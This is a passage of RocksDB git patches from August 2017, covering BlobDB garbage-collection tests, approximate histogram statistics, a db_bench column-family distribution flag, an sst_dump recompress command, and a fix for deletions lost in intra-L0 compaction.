ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -206,7 +207,7 @@ TEST_F(BlobDBTest, PutUntil) { for (size_t i = 0; i < 100; i++) { uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, - (expiration < 100 ? nullptr : &data)); + (expiration <= 100 ? nullptr : &data)); } mock_env_->set_now_micros(100 * 1000000); auto *bdb_impl = static_cast(blob_db_); @@ -217,7 +218,7 @@ TEST_F(BlobDBTest, PutUntil) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -249,7 +250,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(0, gc_stats.num_deletes); - ASSERT_EQ(100, gc_stats.num_relocs); + ASSERT_EQ(100, gc_stats.num_relocate); VerifyDB(data); } @@ -263,7 +264,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { std::string * /*new_value*/, bool * /*value_changed*/) override { *ttl = rnd->Next() % 100; - if (*ttl >= 50) { + if (*ttl > 50) { data[key.ToString()] = value.ToString(); } return true; @@ -295,7 +296,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -310,7 +311,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { std::string * /*new_value*/, bool * /*value_changed*/) override { *expiration = rnd->Next() % 100 + 50; - if (*expiration >= 100) { + if (*expiration > 100) { data[key.ToString()] = value.ToString(); } return true; @@ -342,7 +343,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -385,7 +386,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { std::string value_ttl = value + "ttl:"; PutFixed64(&value_ttl, ttl); ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl))); - if (ttl >= 50) { + if (ttl > 50) { data[key] = value; } } @@ -398,7 +399,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -534,9 +535,7 @@ TEST_F(BlobDBTest, MultipleWriters) { i)); std::map data; for (size_t i = 0; i < 10; i++) { - if (workers[i].joinable()) { - workers[i].join(); - } + workers[i].join(); data.insert(data_set[i].begin(), data_set[i].end()); } VerifyDB(data); @@ -579,7 +578,7 @@ TEST_F(BlobDBTest, SequenceNumber) { } } -TEST_F(BlobDBTest, GCShouldKeepKeysWithNewerVersion) { +TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; @@ -612,11 +611,83 @@ TEST_F(BlobDBTest, GCShouldKeepKeysWithNewerVersion) { } GCStats gc_stats; ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(200, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); - ASSERT_EQ(200 - new_keys, gc_stats.num_relocs); + ASSERT_EQ(200 - new_keys, gc_stats.num_relocate); VerifyDB(data); } +TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + auto writer = port::Thread( + [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); }); + + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(0, gc_stats.relocate_succeeded); + ASSERT_EQ(1, gc_stats.overwritten_while_relocate); + writer.join(); + VerifyDB({{"foo", "v2"}}); +} + +TEST_F(BlobDBTest, GCExpiredKeyWhileOverwritting) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(100 * 1000000); + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + mock_env_->set_now_micros(300 * 1000000); + + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + auto writer = port::Thread([this]() { + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v2", 400)); + }); + + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(1, gc_stats.num_deletes); + ASSERT_EQ(0, gc_stats.delete_succeeded); + ASSERT_EQ(1, gc_stats.overwritten_while_delete); + ASSERT_EQ(0, gc_stats.num_relocate); + writer.join(); + VerifyDB({{"foo", "v2"}}); +} + } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 3931c8669b2..75afab2e743 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) { } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, - WALRecoveryMode wal_recovery_mode) { + uint64_t* blob_offset) { record->Clear(); buffer_.clear(); backing_store_[0] = '\0'; @@ -65,6 +65,9 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, header_crc = crc32c::Extend(header_crc, buffer_.data(), crc_data_size); uint64_t kb_size = record->GetKeySize() + record->GetBlobSize(); + if (blob_offset != nullptr) { + *blob_offset = next_byte_ + record->GetKeySize(); + } switch (level) { case kReadHdrFooter: file_->Skip(kb_size); diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index 05f53fe93f7..5522ec3a28b 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -60,9 +60,9 @@ class Reader { // "*scratch" as temporary storage. The contents filled in *record // will only be valid until the next mutating operation on this // reader or the next mutation to *scratch. + // If blob_offset is non-null, return offset of the blob through it. Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHdrFooter, - WALRecoveryMode wal_recovery_mode = - WALRecoveryMode::kTolerateCorruptedTailRecords); + uint64_t* blob_offset = nullptr); SequentialFileReader* file() { return file_.get(); } From 3f5888430a537c0580d9ee863152c98a3f46d546 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Fri, 11 Aug 2017 12:56:26 -0700 Subject: [PATCH 101/205] Fix c_test ASAN failure Summary: Fix c_test missing deletion of write batch pointer. Closes https://github.com/facebook/rocksdb/pull/2725 Differential Revision: D5613866 Pulled By: yiwu-arbug fbshipit-source-id: bf3f59a6812178577c9c25bae558ef36414a1f51 --- db/c_test.c | 1 + 1 file changed, 1 insertion(+) diff --git a/db/c_test.c b/db/c_test.c index 95d27360748..7b76badf1ce 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -1387,6 +1387,7 @@ int main(int argc, char** argv) { rocksdb_writebatch_put(wb, "box", 3, "c", 1); rocksdb_writebatch_delete(wb, "bar", 3); rocksdb_transactiondb_write(txn_db, woptions, wb, &err); + rocksdb_writebatch_destroy(wb); CheckTxnDBGet(txn_db, roptions, "box", "c"); CheckNoError(err); From 5de98f2d50fec1b5b88a973e825b1156fb03a943 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 13:09:38 -0700 Subject: [PATCH 102/205] approximate histogram stats to save cpu Summary: sounds like we're willing to tradeoff minor inaccuracy in stats for speed. start with histogram stats. ticker stats will be harder (and, IMO, we shouldn't change them in this manner) as many test cases rely on them being exactly correct. Closes https://github.com/facebook/rocksdb/pull/2720 Differential Revision: D5607884 Pulled By: ajkr fbshipit-source-id: 1b754cda35ea6b252d1fdd5aa3cfb58866506372 --- monitoring/histogram.cc | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 56b5a3914a1..083ef75fdf4 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -105,17 +105,26 @@ void HistogramStat::Add(uint64_t value) { // by concurrent threads is tolerable. const size_t index = bucketMapper.IndexForValue(value); assert(index < num_buckets_); - buckets_[index].fetch_add(1, std::memory_order_relaxed); + buckets_[index].store(buckets_[index].load(std::memory_order_relaxed) + 1, + std::memory_order_relaxed); uint64_t old_min = min(); - while (value < old_min && !min_.compare_exchange_weak(old_min, value)) {} + if (value < old_min) { + min_.store(value, std::memory_order_relaxed); + } uint64_t old_max = max(); - while (value > old_max && !max_.compare_exchange_weak(old_max, value)) {} + if (value > old_max) { + max_.store(value, std::memory_order_relaxed); + } - num_.fetch_add(1, std::memory_order_relaxed); - sum_.fetch_add(value, std::memory_order_relaxed); - sum_squares_.fetch_add(value * value, std::memory_order_relaxed); + num_.store(num_.load(std::memory_order_relaxed) + 1, + std::memory_order_relaxed); + sum_.store(sum_.load(std::memory_order_relaxed) + value, + std::memory_order_relaxed); + sum_squares_.store( + sum_squares_.load(std::memory_order_relaxed) + value * value, + std::memory_order_relaxed); } void HistogramStat::Merge(const HistogramStat& other) { From 74f18c13019cb367bdafef4ee7c618d02d62c08d Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 13:46:41 -0700 Subject: [PATCH 103/205] db_bench support for non-uniform column family ops Summary: Previously we could only select the CF on which to operate uniformly at random. This is a limitation, e.g., when testing universal compaction as all CFs would need to run full compaction at roughly the same time, which isn't realistic. This PR allows the user to specify the probability distribution for selecting CFs via the `--column_family_distribution` argument. Closes https://github.com/facebook/rocksdb/pull/2677 Differential Revision: D5544436 Pulled By: ajkr fbshipit-source-id: 478d56260995236ae90895ce5bd51f38882e185a --- tools/db_bench_tool.cc | 52 ++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 50 insertions(+), 2 deletions(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 6f12390af70..0f89095434d 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -206,6 +206,15 @@ DEFINE_int32( "create new set of column families and insert to them. Only used " "when num_column_families > 1."); +DEFINE_string(column_family_distribution, "", + "Comma-separated list of percentages, where the ith element " + "indicates the probability of an op using the ith column family. " + "The number of elements must be `num_hot_column_families` if " + "specified; otherwise, it must be `num_column_families`. The " + "sum of elements must be 100. E.g., if `num_column_families=4`, " + "and `num_hot_column_families=0`, a valid list could be " + "\"10,20,30,40\"."); + DEFINE_int64(reads, -1, "Number of read operations to do. " "If negative, do FLAGS_num reads."); @@ -1198,6 +1207,8 @@ struct DBWithColumnFamilies { // After each CreateNewCf(), another num_hot number of new // Column families will be created and used to be queried. port::Mutex create_cf_mutex; // Only one thread can execute CreateNewCf() + std::vector cfh_idx_to_prob; // ith index holds probability of operating + // on cfh[i]. DBWithColumnFamilies() : db(nullptr) @@ -1217,7 +1228,9 @@ struct DBWithColumnFamilies { opt_txn_db(other.opt_txn_db), #endif // ROCKSDB_LITE num_created(other.num_created.load()), - num_hot(other.num_hot) {} + num_hot(other.num_hot), + cfh_idx_to_prob(other.cfh_idx_to_prob) { + } void DeleteDBs() { std::for_each(cfh.begin(), cfh.end(), @@ -1239,8 +1252,20 @@ struct DBWithColumnFamilies { ColumnFamilyHandle* GetCfh(int64_t rand_num) { assert(num_hot > 0); + size_t rand_offset = 0; + if (!cfh_idx_to_prob.empty()) { + assert(cfh_idx_to_prob.size() == num_hot); + int sum = 0; + while (sum + cfh_idx_to_prob[rand_offset] < rand_num % 100) { + sum += cfh_idx_to_prob[rand_offset]; + ++rand_offset; + } + assert(rand_offset < cfh_idx_to_prob.size()); + } else { + rand_offset = rand_num % num_hot; + } return cfh[num_created.load(std::memory_order_acquire) - num_hot + - rand_num % num_hot]; + rand_offset]; } // stage: assume CF from 0 to stage * num_hot has be created. Need to create @@ -3275,6 +3300,28 @@ void VerifyDBFromDB(std::string& truth_db_name) { column_families.push_back(ColumnFamilyDescriptor( ColumnFamilyName(i), ColumnFamilyOptions(options))); } + std::vector cfh_idx_to_prob; + if (!FLAGS_column_family_distribution.empty()) { + std::stringstream cf_prob_stream(FLAGS_column_family_distribution); + std::string cf_prob; + int sum = 0; + while (std::getline(cf_prob_stream, cf_prob, ',')) { + cfh_idx_to_prob.push_back(std::stoi(cf_prob)); + sum += cfh_idx_to_prob.back(); + } + if (sum != 100) { + fprintf(stderr, "column_family_distribution items must sum to 100\n"); + exit(1); + } + if (cfh_idx_to_prob.size() != num_hot) { + fprintf(stderr, + "got %" ROCKSDB_PRIszt + " column_family_distribution items; expected " + "%" ROCKSDB_PRIszt "\n", + cfh_idx_to_prob.size(), num_hot); + exit(1); + } + } #ifndef ROCKSDB_LITE if (FLAGS_readonly) { s = DB::OpenForReadOnly(options, db_name, column_families, @@ -3302,6 +3349,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { db->cfh.resize(FLAGS_num_column_families); db->num_created = num_hot; db->num_hot = num_hot; + db->cfh_idx_to_prob = std::move(cfh_idx_to_prob); #ifndef ROCKSDB_LITE } else if (FLAGS_readonly) { s = DB::OpenForReadOnly(options, db_name, &db->db); From 8254e9b57c801498f285c5135f5cea7581c63d08 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 15:49:17 -0700 Subject: [PATCH 104/205] make sst_dump compression size command consistent Summary: - like other subcommands, reporting compression sizes should be specified with the `--command` CLI arg. - also added `--compression_types` arg as it's useful to restrict the types of compression used, at least in my dictionary compression experiments. Closes https://github.com/facebook/rocksdb/pull/2706 Differential Revision: D5589520 Pulled By: ajkr fbshipit-source-id: 305bb4ebcc95eecc8a85523cd3b1050619c9ddc5 --- tools/sst_dump_test.cc | 2 +- tools/sst_dump_tool.cc | 81 ++++++++++++++++++++++++--------------- tools/sst_dump_tool_imp.h | 5 ++- 3 files changed, 56 insertions(+), 32 deletions(-) diff --git a/tools/sst_dump_test.cc b/tools/sst_dump_test.cc index 0a222afa33a..460b5a2cc17 100644 --- a/tools/sst_dump_test.cc +++ b/tools/sst_dump_test.cc @@ -195,7 +195,7 @@ TEST_F(SSTDumpToolTest, CompressedSizes) { } snprintf(usage[0], optLength, "./sst_dump"); - snprintf(usage[1], optLength, "--show_compression_sizes"); + snprintf(usage[1], optLength, "--command=recompress"); snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst"); rocksdb::SSTDumpTool tool; ASSERT_TRUE(!tool.Run(3, usage)); diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index fa89e6cdd6a..4dca284cceb 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -60,6 +60,17 @@ extern const uint64_t kLegacyPlainTableMagicNumber; const char* testFileName = "test_file_name"; +static const std::vector> + kCompressions = { + {CompressionType::kNoCompression, "kNoCompression"}, + {CompressionType::kSnappyCompression, "kSnappyCompression"}, + {CompressionType::kZlibCompression, "kZlibCompression"}, + {CompressionType::kBZip2Compression, "kBZip2Compression"}, + {CompressionType::kLZ4Compression, "kLZ4Compression"}, + {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"}, + {CompressionType::kXpressCompression, "kXpressCompression"}, + {CompressionType::kZSTD, "kZSTD"}}; + Status SstFileReader::GetTableReader(const std::string& file_path) { // Warning about 'magic_number' being uninitialized shows up only in UBsan // builds. Though access is guarded by 's.ok()' checks, fix the issue to @@ -174,7 +185,10 @@ uint64_t SstFileReader::CalculateCompressedTableSize( return size; } -int SstFileReader::ShowAllCompressionSizes(size_t block_size) { +int SstFileReader::ShowAllCompressionSizes( + size_t block_size, + const std::vector>& + compression_types) { ReadOptions read_options; Options opts; const ImmutableCFOptions imoptions(opts); @@ -184,17 +198,7 @@ int SstFileReader::ShowAllCompressionSizes(size_t block_size) { fprintf(stdout, "Block Size: %" ROCKSDB_PRIszt "\n", block_size); - std::pair compressions[] = { - {CompressionType::kNoCompression, "kNoCompression"}, - {CompressionType::kSnappyCompression, "kSnappyCompression"}, - {CompressionType::kZlibCompression, "kZlibCompression"}, - {CompressionType::kBZip2Compression, "kBZip2Compression"}, - {CompressionType::kLZ4Compression, "kLZ4Compression"}, - {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"}, - {CompressionType::kXpressCompression, "kXpressCompression"}, - {CompressionType::kZSTD, "kZSTD"}}; - - for (auto& i : compressions) { + for (auto& i : compression_types) { if (CompressionTypeSupported(i.first)) { CompressionOptions compress_opt; std::string column_family_name; @@ -359,6 +363,8 @@ void print_help() { scan: Iterate over entries in files and print them to screen raw: Dump all the table contents to _dump.txt verify: Iterate all the blocks in files verifying checksum to detect possible coruption but dont print anything except if a corruption is encountered + recompress: reports the SST file size if recompressed with different + compression types --output_hex Can be combined with scan command to print the keys and values in Hex @@ -383,15 +389,17 @@ void print_help() { Can be combined with --from and --to to indicate that these values are encoded in Hex --show_properties - Print table properties after iterating over the file - - --show_compression_sizes - Independent command that will recreate the SST file using 16K block size with different - compressions and report the size of the file using such compression + Print table properties after iterating over the file when executing + check|scan|raw --set_block_size= - Can be combined with --show_compression_sizes to set the block size that will be used - when trying different compression algorithms + Can be combined with --command=recompress to set the block size that will + be used when trying different compression algorithms + + --compression_types= + Can be combined with --command=recompress to run recompression for this + list of compression types --parse_internal_key=<0xKEY> Convenience option to parse an internal key on the command line. Dumps the @@ -415,13 +423,13 @@ int SSTDumpTool::Run(int argc, char** argv) { bool has_to = false; bool use_from_as_prefix = false; bool show_properties = false; - bool show_compression_sizes = false; bool show_summary = false; bool set_block_size = false; std::string from_key; std::string to_key; std::string block_size_str; size_t block_size; + std::vector> compression_types; uint64_t total_num_files = 0; uint64_t total_num_data_blocks = 0; uint64_t total_data_block_size = 0; @@ -453,19 +461,34 @@ int SSTDumpTool::Run(int argc, char** argv) { use_from_as_prefix = true; } else if (strcmp(argv[i], "--show_properties") == 0) { show_properties = true; - } else if (strcmp(argv[i], "--show_compression_sizes") == 0) { - show_compression_sizes = true; } else if (strcmp(argv[i], "--show_summary") == 0) { show_summary = true; } else if (strncmp(argv[i], "--set_block_size=", 17) == 0) { set_block_size = true; block_size_str = argv[i] + 17; std::istringstream iss(block_size_str); + iss >> block_size; if (iss.fail()) { - fprintf(stderr, "block size must be numeric"); + fprintf(stderr, "block size must be numeric\n"); exit(1); } - iss >> block_size; + } else if (strncmp(argv[i], "--compression_types=", 20) == 0) { + std::string compression_types_csv = argv[i] + 20; + std::istringstream iss(compression_types_csv); + std::string compression_type; + while (std::getline(iss, compression_type, ',')) { + auto iter = std::find_if( + kCompressions.begin(), kCompressions.end(), + [&compression_type](std::pair curr) { + return curr.second == compression_type; + }); + if (iter == kCompressions.end()) { + fprintf(stderr, "%s is not a valid CompressionType\n", + compression_type.c_str()); + exit(1); + } + compression_types.emplace_back(*iter); + } } else if (strncmp(argv[i], "--parse_internal_key=", 21) == 0) { std::string in_key(argv[i] + 21); try { @@ -547,12 +570,10 @@ int SSTDumpTool::Run(int argc, char** argv) { continue; } - if (show_compression_sizes) { - if (set_block_size) { - reader.ShowAllCompressionSizes(block_size); - } else { - reader.ShowAllCompressionSizes(16384); - } + if (command == "recompress") { + reader.ShowAllCompressionSizes( + set_block_size ? block_size : 16384, + compression_types.empty() ? kCompressions : compression_types); return 0; } diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h index e2b6396071c..9531b5415bd 100644 --- a/tools/sst_dump_tool_imp.h +++ b/tools/sst_dump_tool_imp.h @@ -34,7 +34,10 @@ class SstFileReader { Status DumpTable(const std::string& out_filename); Status getStatus() { return init_result_; } - int ShowAllCompressionSizes(size_t block_size); + int ShowAllCompressionSizes( + size_t block_size, + const std::vector>& + compression_types); private: // Get the TableReader implementation for the sst file From acf935e40f9d6f4c3d13c7d310def7064c1f1c95 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 18:01:28 -0700 Subject: [PATCH 105/205] fix deletion dropping in intra-L0 Summary: `KeyNotExistsBeyondOutputLevel` didn't consider L0 files' key-ranges. So if a key only was covered by older L0 files' key-ranges, we would incorrectly drop deletions of that key. This PR just skips the deletion-dropping optimization when output level is L0. Closes https://github.com/facebook/rocksdb/pull/2726 Differential Revision: D5617286 Pulled By: ajkr fbshipit-source-id: 4bff1396b06d49a828ba4542f249191052915bce --- HISTORY.md | 1 + db/compaction.cc | 4 +++ db/db_compaction_test.cc | 73 +++++++++++++++++++++++++++++++++++----- 3 files changed, 70 insertions(+), 8 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 7c71fdd1687..29f0f3f2701 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -7,6 +7,7 @@ ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. +* Fix incorrect dropping of deletions during intra-L0 compaction. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/db/compaction.cc b/db/compaction.cc index 31adcc29de4..9ea332da3fd 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -288,6 +288,10 @@ bool Compaction::KeyNotExistsBeyondOutputLevel( if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) { return bottommost_level_; } + if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel && + output_level_ == 0) { + return false; + } // Maybe use binary search to find right entry instead of linear search? const Comparator* user_cmp = cfd_->user_comparator(); for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) { diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index 4c7da8d1b50..bca188a9832 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -2602,13 +2602,11 @@ TEST_P(DBCompactionTestWithParam, IntraL0Compaction) { // Files 6-9 are the longest span of available files for which // work-per-deleted-file decreases (see "score" row above). for (int i = 0; i < 10; ++i) { - for (int j = 0; j < 2; ++j) { - ASSERT_OK(Put(Key(0), "")); // prevents trivial move - if (i == 5) { - ASSERT_OK(Put(Key(i + 1), value + value)); - } else { - ASSERT_OK(Put(Key(i + 1), value)); - } + ASSERT_OK(Put(Key(0), "")); // prevents trivial move + if (i == 5) { + ASSERT_OK(Put(Key(i + 1), value + value)); + } else { + ASSERT_OK(Put(Key(i + 1), value)); } ASSERT_OK(Flush()); } @@ -2623,10 +2621,69 @@ TEST_P(DBCompactionTestWithParam, IntraL0Compaction) { ASSERT_EQ(2, level_to_files[0].size()); ASSERT_GT(level_to_files[1].size(), 0); for (int i = 0; i < 2; ++i) { - ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 21); + ASSERT_GE(level_to_files[0][i].fd.file_size, 1 << 21); } } +TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) { + // regression test for issue #2722: L0->L0 compaction can resurrect deleted + // keys from older L0 files if L1+ files' key-ranges do not include the key. + Options options = CurrentOptions(); + options.compression = kNoCompression; + options.level0_file_num_compaction_trigger = 5; + options.max_background_compactions = 2; + options.max_subcompactions = max_subcompactions_; + DestroyAndReopen(options); + + const size_t kValueSize = 1 << 20; + Random rnd(301); + std::string value(RandomString(&rnd, kValueSize)); + + rocksdb::SyncPoint::GetInstance()->LoadDependency( + {{"LevelCompactionPicker::PickCompactionBySize:0", + "CompactionJob::Run():Start"}}); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + // index: 0 1 2 3 4 5 6 7 8 9 + // size: 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB + // score: 1.25 1.33 1.5 2.0 inf + // + // Files 0-4 will be included in an L0->L1 compaction. + // + // L0->L0 will be triggered since the sync points guarantee compaction to base + // level is still blocked when files 5-9 trigger another compaction. All files + // 5-9 are included in the L0->L0 due to work-per-deleted file decreasing. + // + // Put a key-value in files 0-4. Delete that key in files 5-9. Verify the + // L0->L0 preserves the deletion such that the key remains deleted. + for (int i = 0; i < 10; ++i) { + // key 0 serves both to prevent trivial move and as the key we want to + // verify is not resurrected by L0->L0 compaction. + if (i < 5) { + ASSERT_OK(Put(Key(0), "")); + } else { + ASSERT_OK(Delete(Key(0))); + } + ASSERT_OK(Put(Key(i + 1), value)); + ASSERT_OK(Flush()); + } + dbfull()->TEST_WaitForCompact(); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + + std::vector> level_to_files; + dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(), + &level_to_files); + ASSERT_GE(level_to_files.size(), 2); // at least L0 and L1 + // L0 has a single output file from L0->L0 + ASSERT_EQ(1, level_to_files[0].size()); + ASSERT_GT(level_to_files[1].size(), 0); + ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 22); + + ReadOptions roptions; + std::string result; + ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound()); +} + INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam, ::testing::Values(std::make_tuple(1, true), std::make_tuple(1, false), From a144a9782d5929ecc22b5b41876859514c22c0aa Mon Sep 17 00:00:00 2001 From: Adam Retter Date: Sat, 12 Aug 2017 16:26:56 -0700 Subject: [PATCH 106/205] Fix for CMakeLists.txt on Windows for RocksJava Summary: Closes https://github.com/facebook/rocksdb/pull/2730 Differential Revision: D5619256 Pulled By: ajkr fbshipit-source-id: c80d697eeceab91964259132e58f5cd2219efb93 --- java/CMakeLists.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/java/CMakeLists.txt b/java/CMakeLists.txt index a34cda6ca85..d67896c2cd8 100644 --- a/java/CMakeLists.txt +++ b/java/CMakeLists.txt @@ -77,6 +77,7 @@ set(NATIVE_JAVA_CLASSES org.rocksdb.FlushOptions org.rocksdb.HashLinkedListMemTableConfig org.rocksdb.HashSkipListMemTableConfig + org.rocksdb.IngestExternalFileOptions org.rocksdb.Logger org.rocksdb.LRUCache org.rocksdb.MemTableConfig From 5449c0990b32ac0fcc69faeed9bada5ff1fa4a8a Mon Sep 17 00:00:00 2001 From: Andrew Gallagher Date: Sun, 13 Aug 2017 17:04:19 -0700 Subject: [PATCH 107/205] rocksdb: make buildable on aarch64 Summary: - Remove default arch-specified flags. - Move non-default arch-specific flags to arch-specific param. Reviewed By: yiwu-arbug Differential Revision: D5597499 fbshipit-source-id: c53108ac39c73ac36893d3fd9aaf3b5e3080f1ae --- TARGETS | 10 +++++++++- buckifier/targets_cfg.py | 11 ++++++++--- 2 files changed, 17 insertions(+), 4 deletions(-) diff --git a/TARGETS b/TARGETS index dcf2729e7bd..3fac4a73785 100644 --- a/TARGETS +++ b/TARGETS @@ -14,7 +14,6 @@ rocksdb_compiler_flags = [ "-DROCKSDB_RANGESYNC_PRESENT", "-DROCKSDB_SCHED_GETCPU_PRESENT", "-DROCKSDB_SUPPORT_THREAD_LOCAL", - "-DHAVE_SSE42", "-DOS_LINUX", "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include @@ -48,6 +47,10 @@ rocksdb_preprocessor_flags = [ "-I" + REPO_PATH, ] +rocksdb_arch_preprocessor_flags = { + "x86_64": ["-DHAVE_SSE42"], +} + cpp_library( name = "rocksdb_lib", headers = AutoHeaders.RECURSIVE_GLOB, @@ -263,6 +266,7 @@ cpp_library( ], deps = [], preprocessor_flags = 